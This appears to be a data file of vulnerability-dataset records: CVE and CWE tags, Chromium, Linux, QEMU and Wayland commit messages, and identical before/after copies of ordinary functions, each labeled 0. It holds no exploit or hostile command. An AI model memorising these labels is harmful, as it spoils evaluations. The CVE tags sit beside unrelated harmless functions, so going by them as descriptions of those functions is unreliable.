null | null | null | https://github.com/chromium/chromium/commit/87c15175997b0103166020d79fe9048dcf4025f4 | 87c15175997b0103166020d79fe9048dcf4025f4 | Add support for horizontal mouse wheel messages in Windows Desktop Aura.
This is simply a matter of recognizing the WM_MOUSEHWHEEL message as a valid mouse wheel message.
Tested this on web pages with horizontal scrollbars and it works well.
BUG=332797
R=sky@chromium.org, sky
Review URL: https://codereview.chromium.org/140653006
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@245651 0039d316-1c4b-4281-b951-d872f2087c98 | bool IsKeyEvent(const base::NativeEvent& native_event) {
return native_event.message == WM_KEYDOWN ||
native_event.message == WM_SYSKEYDOWN ||
native_event.message == WM_CHAR ||
native_event.message == WM_KEYUP ||
native_event.message == WM_SYSKEYUP;
}
| bool IsKeyEvent(const base::NativeEvent& native_event) {
return native_event.message == WM_KEYDOWN ||
native_event.message == WM_SYSKEYDOWN ||
native_event.message == WM_CHAR ||
native_event.message == WM_KEYUP ||
native_event.message == WM_SYSKEYUP;
}
| C | Chrome | 0 |
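The record above says the whole change is recognizing WM_MOUSEHWHEEL as a valid mouse-wheel message; only the neighbouring IsKeyEvent() helper is shown. A hedged sketch of the corresponding wheel predicate in the same style — not necessarily the exact Chromium function:
bool IsMouseWheelEventSketch(const base::NativeEvent& native_event) {
  // Horizontal wheel ticks (WM_MOUSEHWHEEL) now count as wheel input,
  // alongside the vertical WM_MOUSEWHEEL message.
  return native_event.message == WM_MOUSEWHEEL ||
         native_event.message == WM_MOUSEHWHEEL;
}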
CVE-2017-5061 | https://www.cvedetails.com/cve/CVE-2017-5061/ | CWE-362 | https://github.com/chromium/chromium/commit/5d78b84d39bd34bc9fce9d01c0dcd5a22a330d34 | 5d78b84d39bd34bc9fce9d01c0dcd5a22a330d34 | (Reland) Discard compositor frames from unloaded web content
This is a reland of https://codereview.chromium.org/2707243005/ with a
small change to fix an uninitialized memory error that fails on MSAN
bots.
BUG=672847
TBR=danakj@chromium.org, creis@chromium.org
CQ_INCLUDE_TRYBOTS=master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_site_isolation
Review-Url: https://codereview.chromium.org/2731283003
Cr-Commit-Position: refs/heads/master@{#454954} | void LayerTreeHost::SetNextCommitForcesRedraw() {
next_commit_forces_redraw_ = true;
proxy_->SetNeedsUpdateLayers();
}
| void LayerTreeHost::SetNextCommitForcesRedraw() {
next_commit_forces_redraw_ = true;
proxy_->SetNeedsUpdateLayers();
}
| C | Chrome | 0 |
CVE-2017-5009 | https://www.cvedetails.com/cve/CVE-2017-5009/ | CWE-119 | https://github.com/chromium/chromium/commit/1c40f9042ae2d6ee7483d72998aabb5e73b2ff60 | 1c40f9042ae2d6ee7483d72998aabb5e73b2ff60 | DevTools: send proper resource type in Network.RequestWillBeSent
This patch plumbs resoure type into the DispatchWillSendRequest
instrumenation. This allows us to report accurate type in
Network.RequestWillBeSent event, instead of "Other", that we report
today.
BUG=765501
R=dgozman
Change-Id: I0134c08b841e8dd247fdc8ff208bfd51e462709c
Reviewed-on: https://chromium-review.googlesource.com/667504
Reviewed-by: Pavel Feldman <pfeldman@chromium.org>
Reviewed-by: Dmitry Gozman <dgozman@chromium.org>
Commit-Queue: Andrey Lushnikov <lushnikov@chromium.org>
Cr-Commit-Position: refs/heads/master@{#507936} | void InspectorPageAgent::DidClearDocumentOfWindowObject(LocalFrame* frame) {
if (!GetFrontend())
return;
protocol::DictionaryValue* scripts =
state_->getObject(PageAgentState::kPageAgentScriptsToEvaluateOnLoad);
if (scripts) {
for (size_t i = 0; i < scripts->size(); ++i) {
auto script = scripts->at(i);
String script_text;
if (script.second->asString(&script_text))
frame->GetScriptController().ExecuteScriptInMainWorld(script_text);
}
}
if (!script_to_evaluate_on_load_once_.IsEmpty()) {
frame->GetScriptController().ExecuteScriptInMainWorld(
script_to_evaluate_on_load_once_);
}
}
| void InspectorPageAgent::DidClearDocumentOfWindowObject(LocalFrame* frame) {
if (!GetFrontend())
return;
protocol::DictionaryValue* scripts =
state_->getObject(PageAgentState::kPageAgentScriptsToEvaluateOnLoad);
if (scripts) {
for (size_t i = 0; i < scripts->size(); ++i) {
auto script = scripts->at(i);
String script_text;
if (script.second->asString(&script_text))
frame->GetScriptController().ExecuteScriptInMainWorld(script_text);
}
}
if (!script_to_evaluate_on_load_once_.IsEmpty()) {
frame->GetScriptController().ExecuteScriptInMainWorld(
script_to_evaluate_on_load_once_);
}
}
| C | Chrome | 0 |
CVE-2012-2875 | https://www.cvedetails.com/cve/CVE-2012-2875/ | null | https://github.com/chromium/chromium/commit/1266ba494530a267ec8a21442ea1b5cae94da4fb | 1266ba494530a267ec8a21442ea1b5cae94da4fb | Introduce XGetImage() for GrabWindowSnapshot() in ChromeOS.
BUG=119492
TEST=manually done
Review URL: https://chromiumcodereview.appspot.com/10386124
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@137556 0039d316-1c4b-4281-b951-d872f2087c98 | void RootWindowHostWin::ToggleFullScreen() {
gfx::Rect target_rect;
if (!fullscreen_) {
fullscreen_ = true;
saved_window_style_ = GetWindowLong(hwnd(), GWL_STYLE);
saved_window_ex_style_ = GetWindowLong(hwnd(), GWL_EXSTYLE);
GetWindowRect(hwnd(), &saved_window_rect_);
SetWindowLong(hwnd(), GWL_STYLE,
saved_window_style_ & ~(WS_CAPTION | WS_THICKFRAME));
SetWindowLong(hwnd(), GWL_EXSTYLE,
saved_window_ex_style_ & ~(WS_EX_DLGMODALFRAME |
WS_EX_WINDOWEDGE | WS_EX_CLIENTEDGE | WS_EX_STATICEDGE));
MONITORINFO mi;
mi.cbSize = sizeof(mi);
GetMonitorInfo(MonitorFromWindow(hwnd(), MONITOR_DEFAULTTONEAREST), &mi);
target_rect = mi.rcMonitor;
} else {
fullscreen_ = false;
SetWindowLong(hwnd(), GWL_STYLE, saved_window_style_);
SetWindowLong(hwnd(), GWL_EXSTYLE, saved_window_ex_style_);
target_rect = saved_window_rect_;
}
SetWindowPos(hwnd(),
NULL,
target_rect.x(),
target_rect.y(),
target_rect.width(),
target_rect.height(),
SWP_NOZORDER | SWP_NOACTIVATE | SWP_FRAMECHANGED);
}
| void RootWindowHostWin::ToggleFullScreen() {
gfx::Rect target_rect;
if (!fullscreen_) {
fullscreen_ = true;
saved_window_style_ = GetWindowLong(hwnd(), GWL_STYLE);
saved_window_ex_style_ = GetWindowLong(hwnd(), GWL_EXSTYLE);
GetWindowRect(hwnd(), &saved_window_rect_);
SetWindowLong(hwnd(), GWL_STYLE,
saved_window_style_ & ~(WS_CAPTION | WS_THICKFRAME));
SetWindowLong(hwnd(), GWL_EXSTYLE,
saved_window_ex_style_ & ~(WS_EX_DLGMODALFRAME |
WS_EX_WINDOWEDGE | WS_EX_CLIENTEDGE | WS_EX_STATICEDGE));
MONITORINFO mi;
mi.cbSize = sizeof(mi);
GetMonitorInfo(MonitorFromWindow(hwnd(), MONITOR_DEFAULTTONEAREST), &mi);
target_rect = mi.rcMonitor;
} else {
fullscreen_ = false;
SetWindowLong(hwnd(), GWL_STYLE, saved_window_style_);
SetWindowLong(hwnd(), GWL_EXSTYLE, saved_window_ex_style_);
target_rect = saved_window_rect_;
}
SetWindowPos(hwnd(),
NULL,
target_rect.x(),
target_rect.y(),
target_rect.width(),
target_rect.height(),
SWP_NOZORDER | SWP_NOACTIVATE | SWP_FRAMECHANGED);
}
| C | Chrome | 0 |
CVE-2016-4964 | https://www.cvedetails.com/cve/CVE-2016-4964/ | CWE-20 | https://git.qemu.org/?p=qemu.git;a=commit;h=06630554ccbdd25780aa03c3548aaff1eb56dffd | 06630554ccbdd25780aa03c3548aaff1eb56dffd | null | static int mptsas_process_scsi_io_request(MPTSASState *s,
MPIMsgSCSIIORequest *scsi_io,
hwaddr addr)
{
MPTSASRequest *req;
MPIMsgSCSIIOReply reply;
SCSIDevice *sdev;
int status;
mptsas_fix_scsi_io_endianness(scsi_io);
trace_mptsas_process_scsi_io_request(s, scsi_io->Bus, scsi_io->TargetID,
scsi_io->LUN[1], scsi_io->DataLength);
status = mptsas_scsi_device_find(s, scsi_io->Bus, scsi_io->TargetID,
scsi_io->LUN, &sdev);
if (status) {
goto bad;
}
req = g_new(MPTSASRequest, 1);
QTAILQ_INSERT_TAIL(&s->pending, req, next);
req->scsi_io = *scsi_io;
req->dev = s;
status = mptsas_build_sgl(s, req, addr);
if (status) {
goto free_bad;
}
if (req->qsg.size < scsi_io->DataLength) {
trace_mptsas_sgl_overflow(s, scsi_io->MsgContext, scsi_io->DataLength,
req->qsg.size);
status = MPI_IOCSTATUS_INVALID_SGL;
goto free_bad;
}
req->sreq = scsi_req_new(sdev, scsi_io->MsgContext,
scsi_io->LUN[1], scsi_io->CDB, req);
if (req->sreq->cmd.xfer > scsi_io->DataLength) {
goto overrun;
}
switch (scsi_io->Control & MPI_SCSIIO_CONTROL_DATADIRECTION_MASK) {
case MPI_SCSIIO_CONTROL_NODATATRANSFER:
if (req->sreq->cmd.mode != SCSI_XFER_NONE) {
goto overrun;
}
break;
case MPI_SCSIIO_CONTROL_WRITE:
if (req->sreq->cmd.mode != SCSI_XFER_TO_DEV) {
goto overrun;
}
break;
case MPI_SCSIIO_CONTROL_READ:
if (req->sreq->cmd.mode != SCSI_XFER_FROM_DEV) {
goto overrun;
}
break;
}
if (scsi_req_enqueue(req->sreq)) {
scsi_req_continue(req->sreq);
}
return 0;
overrun:
trace_mptsas_scsi_overflow(s, scsi_io->MsgContext, req->sreq->cmd.xfer,
scsi_io->DataLength);
status = MPI_IOCSTATUS_SCSI_DATA_OVERRUN;
free_bad:
mptsas_free_request(req);
bad:
memset(&reply, 0, sizeof(reply));
reply.TargetID = scsi_io->TargetID;
reply.Bus = scsi_io->Bus;
reply.MsgLength = sizeof(reply) / 4;
reply.Function = scsi_io->Function;
reply.CDBLength = scsi_io->CDBLength;
reply.SenseBufferLength = scsi_io->SenseBufferLength;
reply.MsgContext = scsi_io->MsgContext;
reply.SCSIState = MPI_SCSI_STATE_NO_SCSI_STATUS;
reply.IOCStatus = status;
mptsas_fix_scsi_io_reply_endianness(&reply);
mptsas_reply(s, (MPIDefaultReply *)&reply);
return 0;
}
| static int mptsas_process_scsi_io_request(MPTSASState *s,
MPIMsgSCSIIORequest *scsi_io,
hwaddr addr)
{
MPTSASRequest *req;
MPIMsgSCSIIOReply reply;
SCSIDevice *sdev;
int status;
mptsas_fix_scsi_io_endianness(scsi_io);
trace_mptsas_process_scsi_io_request(s, scsi_io->Bus, scsi_io->TargetID,
scsi_io->LUN[1], scsi_io->DataLength);
status = mptsas_scsi_device_find(s, scsi_io->Bus, scsi_io->TargetID,
scsi_io->LUN, &sdev);
if (status) {
goto bad;
}
req = g_new(MPTSASRequest, 1);
QTAILQ_INSERT_TAIL(&s->pending, req, next);
req->scsi_io = *scsi_io;
req->dev = s;
status = mptsas_build_sgl(s, req, addr);
if (status) {
goto free_bad;
}
if (req->qsg.size < scsi_io->DataLength) {
trace_mptsas_sgl_overflow(s, scsi_io->MsgContext, scsi_io->DataLength,
req->qsg.size);
status = MPI_IOCSTATUS_INVALID_SGL;
goto free_bad;
}
req->sreq = scsi_req_new(sdev, scsi_io->MsgContext,
scsi_io->LUN[1], scsi_io->CDB, req);
if (req->sreq->cmd.xfer > scsi_io->DataLength) {
goto overrun;
}
switch (scsi_io->Control & MPI_SCSIIO_CONTROL_DATADIRECTION_MASK) {
case MPI_SCSIIO_CONTROL_NODATATRANSFER:
if (req->sreq->cmd.mode != SCSI_XFER_NONE) {
goto overrun;
}
break;
case MPI_SCSIIO_CONTROL_WRITE:
if (req->sreq->cmd.mode != SCSI_XFER_TO_DEV) {
goto overrun;
}
break;
case MPI_SCSIIO_CONTROL_READ:
if (req->sreq->cmd.mode != SCSI_XFER_FROM_DEV) {
goto overrun;
}
break;
}
if (scsi_req_enqueue(req->sreq)) {
scsi_req_continue(req->sreq);
}
return 0;
overrun:
trace_mptsas_scsi_overflow(s, scsi_io->MsgContext, req->sreq->cmd.xfer,
scsi_io->DataLength);
status = MPI_IOCSTATUS_SCSI_DATA_OVERRUN;
free_bad:
mptsas_free_request(req);
bad:
memset(&reply, 0, sizeof(reply));
reply.TargetID = scsi_io->TargetID;
reply.Bus = scsi_io->Bus;
reply.MsgLength = sizeof(reply) / 4;
reply.Function = scsi_io->Function;
reply.CDBLength = scsi_io->CDBLength;
reply.SenseBufferLength = scsi_io->SenseBufferLength;
reply.MsgContext = scsi_io->MsgContext;
reply.SCSIState = MPI_SCSI_STATE_NO_SCSI_STATUS;
reply.IOCStatus = status;
mptsas_fix_scsi_io_reply_endianness(&reply);
mptsas_reply(s, (MPIDefaultReply *)&reply);
return 0;
}
| C | qemu | 0 |
CVE-2018-6121 | https://www.cvedetails.com/cve/CVE-2018-6121/ | CWE-20 | https://github.com/chromium/chromium/commit/7614790c80996d32a28218f4d1605b0908e9ddf6 | 7614790c80996d32a28218f4d1605b0908e9ddf6 | Apply ExtensionNavigationThrottle filesystem/blob checks to all frames.
BUG=836858
Change-Id: I34333a72501129fd40b5a9aa6378c9f35f1e7fc2
Reviewed-on: https://chromium-review.googlesource.com/1028511
Reviewed-by: Devlin <rdevlin.cronin@chromium.org>
Reviewed-by: Alex Moshchuk <alexmos@chromium.org>
Reviewed-by: Nick Carter <nick@chromium.org>
Commit-Queue: Charlie Reis <creis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#553867} | TitleWatcher::TitleWatcher(WebContents* web_contents,
const base::string16& expected_title)
: WebContentsObserver(web_contents) {
expected_titles_.push_back(expected_title);
}
| TitleWatcher::TitleWatcher(WebContents* web_contents,
const base::string16& expected_title)
: WebContentsObserver(web_contents) {
expected_titles_.push_back(expected_title);
}
| C | Chrome | 0 |
CVE-2013-0882 | https://www.cvedetails.com/cve/CVE-2013-0882/ | CWE-119 | https://github.com/chromium/chromium/commit/25f9415f43d607d3d01f542f067e3cc471983e6b | 25f9415f43d607d3d01f542f067e3cc471983e6b | Add HTMLFormControlElement::supportsAutofocus to fix a FIXME comment.
This virtual function should return true if the form control can hanlde
'autofocucs' attribute if it is specified.
Note: HTMLInputElement::supportsAutofocus reuses InputType::isInteractiveContent
because interactiveness is required for autofocus capability.
BUG=none
TEST=none; no behavior changes.
Review URL: https://codereview.chromium.org/143343003
git-svn-id: svn://svn.chromium.org/blink/trunk@165432 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | PassRefPtr<HTMLTextAreaElement> HTMLTextAreaElement::create(Document& document, HTMLFormElement* form)
{
RefPtr<HTMLTextAreaElement> textArea = adoptRef(new HTMLTextAreaElement(document, form));
textArea->ensureUserAgentShadowRoot();
return textArea.release();
}
| PassRefPtr<HTMLTextAreaElement> HTMLTextAreaElement::create(Document& document, HTMLFormElement* form)
{
RefPtr<HTMLTextAreaElement> textArea = adoptRef(new HTMLTextAreaElement(document, form));
textArea->ensureUserAgentShadowRoot();
return textArea.release();
}
| C | Chrome | 0 |
CVE-2017-7533 | https://www.cvedetails.com/cve/CVE-2017-7533/ | CWE-362 | https://github.com/torvalds/linux/commit/49d31c2f389acfe83417083e1208422b4091cd9e | 49d31c2f389acfe83417083e1208422b4091cd9e | dentry name snapshots
take_dentry_name_snapshot() takes a safe snapshot of dentry name;
if the name is a short one, it gets copied into caller-supplied
structure, otherwise an extra reference to external name is grabbed
(those are never modified). In either case the pointer to stable
string is stored into the same structure.
dentry must be held by the caller of take_dentry_name_snapshot(),
but may be freely dropped afterwards - the snapshot will stay
until destroyed by release_dentry_name_snapshot().
Intended use:
struct name_snapshot s;
take_dentry_name_snapshot(&s, dentry);
...
access s.name
...
release_dentry_name_snapshot(&s);
Replaces fsnotify_oldname_...(), gets used in fsnotify to obtain the name
to pass down with event.
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | static inline u64 hash_name(const void *salt, const char *name)
{
unsigned long hash = init_name_hash(salt);
unsigned long len = 0, c;
c = (unsigned char)*name;
do {
len++;
hash = partial_name_hash(c, hash);
c = (unsigned char)name[len];
} while (c && c != '/');
return hashlen_create(end_name_hash(hash), len);
}
| static inline u64 hash_name(const void *salt, const char *name)
{
unsigned long hash = init_name_hash(salt);
unsigned long len = 0, c;
c = (unsigned char)*name;
do {
len++;
hash = partial_name_hash(c, hash);
c = (unsigned char)name[len];
} while (c && c != '/');
return hashlen_create(end_name_hash(hash), len);
}
| C | linux | 0 |
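The dentry-name-snapshot record above already spells out the intended call sequence; a hedged sketch of what the snapshot type and take function look like underneath follows. The *_sketch identifiers are placeholders for fs/dcache.c internals, the buffer size is only on the order of DNAME_INLINE_LEN, and the real take_dentry_name_snapshot() additionally serializes against renames via d_lock.
struct name_snapshot_sketch {
	const unsigned char *name;	/* stable pointer handed to callers */
	unsigned char inline_copy[40];	/* big enough for short names */
};

static void take_dentry_name_snapshot_sketch(struct name_snapshot_sketch *s,
					     struct dentry *d)
{
	if (dname_is_external_sketch(d)) {
		/* Long names live in refcounted external storage: pin it. */
		external_name_get_sketch(d);
		s->name = d->d_name.name;
	} else {
		/* Short names are embedded in the dentry: take a copy. */
		strcpy((char *)s->inline_copy, (const char *)d->d_name.name);
		s->name = s->inline_copy;
	}
}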
CVE-2012-5148 | https://www.cvedetails.com/cve/CVE-2012-5148/ | CWE-20 | https://github.com/chromium/chromium/commit/e89cfcb9090e8c98129ae9160c513f504db74599 | e89cfcb9090e8c98129ae9160c513f504db74599 | Remove TabContents from TabStripModelObserver::TabDetachedAt.
BUG=107201
TEST=no visible change
Review URL: https://chromiumcodereview.appspot.com/11293205
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@167122 0039d316-1c4b-4281-b951-d872f2087c98 | AppLaunchObserver::~AppLaunchObserver() {}
| AppLaunchObserver::~AppLaunchObserver() {}
| C | Chrome | 0 |
CVE-2013-1828 | https://www.cvedetails.com/cve/CVE-2013-1828/ | CWE-20 | https://github.com/torvalds/linux/commit/726bc6b092da4c093eb74d13c07184b18c1af0f1 | 726bc6b092da4c093eb74d13c07184b18c1af0f1 | net/sctp: Validate parameter size for SCTP_GET_ASSOC_STATS
Building sctp may fail with:
In function 'copy_from_user',
inlined from 'sctp_getsockopt_assoc_stats' at
net/sctp/socket.c:5656:20:
arch/x86/include/asm/uaccess_32.h:211:26: error: call to
'copy_from_user_overflow' declared with attribute error: copy_from_user()
buffer size is not provably correct
if built with W=1 due to a missing parameter size validation
before the call to copy_from_user.
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Acked-by: Vlad Yasevich <vyasevich@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | static int sctp_setsockopt_rtoinfo(struct sock *sk, char __user *optval, unsigned int optlen)
{
struct sctp_rtoinfo rtoinfo;
struct sctp_association *asoc;
if (optlen != sizeof (struct sctp_rtoinfo))
return -EINVAL;
if (copy_from_user(&rtoinfo, optval, optlen))
return -EFAULT;
asoc = sctp_id2assoc(sk, rtoinfo.srto_assoc_id);
/* Set the values to the specific association */
if (!asoc && rtoinfo.srto_assoc_id && sctp_style(sk, UDP))
return -EINVAL;
if (asoc) {
if (rtoinfo.srto_initial != 0)
asoc->rto_initial =
msecs_to_jiffies(rtoinfo.srto_initial);
if (rtoinfo.srto_max != 0)
asoc->rto_max = msecs_to_jiffies(rtoinfo.srto_max);
if (rtoinfo.srto_min != 0)
asoc->rto_min = msecs_to_jiffies(rtoinfo.srto_min);
} else {
/* If there is no association or the association-id = 0
* set the values to the endpoint.
*/
struct sctp_sock *sp = sctp_sk(sk);
if (rtoinfo.srto_initial != 0)
sp->rtoinfo.srto_initial = rtoinfo.srto_initial;
if (rtoinfo.srto_max != 0)
sp->rtoinfo.srto_max = rtoinfo.srto_max;
if (rtoinfo.srto_min != 0)
sp->rtoinfo.srto_min = rtoinfo.srto_min;
}
return 0;
}
| static int sctp_setsockopt_rtoinfo(struct sock *sk, char __user *optval, unsigned int optlen)
{
struct sctp_rtoinfo rtoinfo;
struct sctp_association *asoc;
if (optlen != sizeof (struct sctp_rtoinfo))
return -EINVAL;
if (copy_from_user(&rtoinfo, optval, optlen))
return -EFAULT;
asoc = sctp_id2assoc(sk, rtoinfo.srto_assoc_id);
/* Set the values to the specific association */
if (!asoc && rtoinfo.srto_assoc_id && sctp_style(sk, UDP))
return -EINVAL;
if (asoc) {
if (rtoinfo.srto_initial != 0)
asoc->rto_initial =
msecs_to_jiffies(rtoinfo.srto_initial);
if (rtoinfo.srto_max != 0)
asoc->rto_max = msecs_to_jiffies(rtoinfo.srto_max);
if (rtoinfo.srto_min != 0)
asoc->rto_min = msecs_to_jiffies(rtoinfo.srto_min);
} else {
/* If there is no association or the association-id = 0
* set the values to the endpoint.
*/
struct sctp_sock *sp = sctp_sk(sk);
if (rtoinfo.srto_initial != 0)
sp->rtoinfo.srto_initial = rtoinfo.srto_initial;
if (rtoinfo.srto_max != 0)
sp->rtoinfo.srto_max = rtoinfo.srto_max;
if (rtoinfo.srto_min != 0)
sp->rtoinfo.srto_min = rtoinfo.srto_min;
}
return 0;
}
| C | linux | 0 |
CVE-2017-16612 | https://www.cvedetails.com/cve/CVE-2017-16612/ | CWE-190 | https://cgit.freedesktop.org/wayland/wayland/commit/?id=5d201df72f3d4f4cb8b8f75f980169b03507da38 | 5d201df72f3d4f4cb8b8f75f980169b03507da38 | null | XcursorImagesSetName (XcursorImages *images, const char *name)
{
char *new;
if (!images || !name)
return;
new = malloc (strlen (name) + 1);
if (!new)
return;
strcpy (new, name);
if (images->name)
free (images->name);
images->name = new;
}
| XcursorImagesSetName (XcursorImages *images, const char *name)
{
char *new;
if (!images || !name)
return;
new = malloc (strlen (name) + 1);
if (!new)
return;
strcpy (new, name);
if (images->name)
free (images->name);
images->name = new;
}
| C | wayland | 0 |
null | null | null | https://github.com/chromium/chromium/commit/d4cd2b2c0953ad7e9fa988c234eb9361be80fe81 | d4cd2b2c0953ad7e9fa988c234eb9361be80fe81 | DevTools: 'Overrides' UI overlay obstructs page and element inspector
BUG=302862
R=vsevik@chromium.org
Review URL: https://codereview.chromium.org/40233006
git-svn-id: svn://svn.chromium.org/blink/trunk@160559 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | void InspectorPageAgent::didScroll()
{
if (m_enabled)
m_overlay->update();
}
| void InspectorPageAgent::didScroll()
{
if (m_enabled)
m_overlay->update();
}
| C | Chrome | 0 |
CVE-2014-3200 | https://www.cvedetails.com/cve/CVE-2014-3200/ | null | https://github.com/chromium/chromium/commit/c0947dabeaa10da67798c1bbc668dca4b280cad5 | c0947dabeaa10da67798c1bbc668dca4b280cad5 | [Contextual Search] Change "Now on Tap" to "Contextual Cards"
BUG=644934
Review-Url: https://codereview.chromium.org/2361163003
Cr-Commit-Position: refs/heads/master@{#420899} | bool found() const { return !key.empty(); }
| bool found() const { return !key.empty(); }
| C | Chrome | 0 |
CVE-2011-3107 | https://www.cvedetails.com/cve/CVE-2011-3107/ | null | https://github.com/chromium/chromium/commit/89e4098439f73cb5c16996511cbfdb171a26e173 | 89e4098439f73cb5c16996511cbfdb171a26e173 | [Qt][WK2] There's no way to test the gesture tap on WTR
https://bugs.webkit.org/show_bug.cgi?id=92895
Reviewed by Kenneth Rohde Christiansen.
Source/WebKit2:
Add an instance of QtViewportHandler to QQuickWebViewPrivate, so it's
now available on mobile and desktop modes, as a side effect gesture tap
events can now be created and sent to WebCore.
This is needed to test tap gestures and to get tap gestures working
when you have a WebView (in desktop mode) on notebooks equipped with
touch screens.
* UIProcess/API/qt/qquickwebview.cpp:
(QQuickWebViewPrivate::onComponentComplete):
(QQuickWebViewFlickablePrivate::onComponentComplete): Implementation
moved to QQuickWebViewPrivate::onComponentComplete.
* UIProcess/API/qt/qquickwebview_p_p.h:
(QQuickWebViewPrivate):
(QQuickWebViewFlickablePrivate):
Tools:
WTR doesn't create the QQuickItem from C++, not from QML, so a call
to componentComplete() was added to mimic the QML behaviour.
* WebKitTestRunner/qt/PlatformWebViewQt.cpp:
(WTR::PlatformWebView::PlatformWebView):
git-svn-id: svn://svn.chromium.org/blink/trunk@124625 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | QQuickWebView::QQuickWebView(QQuickItem* parent)
: QQuickFlickable(parent)
, d_ptr(createPrivateObject(this))
, m_experimental(new QQuickWebViewExperimental(this))
{
Q_D(QQuickWebView);
d->initialize();
}
| QQuickWebView::QQuickWebView(QQuickItem* parent)
: QQuickFlickable(parent)
, d_ptr(createPrivateObject(this))
, m_experimental(new QQuickWebViewExperimental(this))
{
Q_D(QQuickWebView);
d->initialize();
}
| C | Chrome | 0 |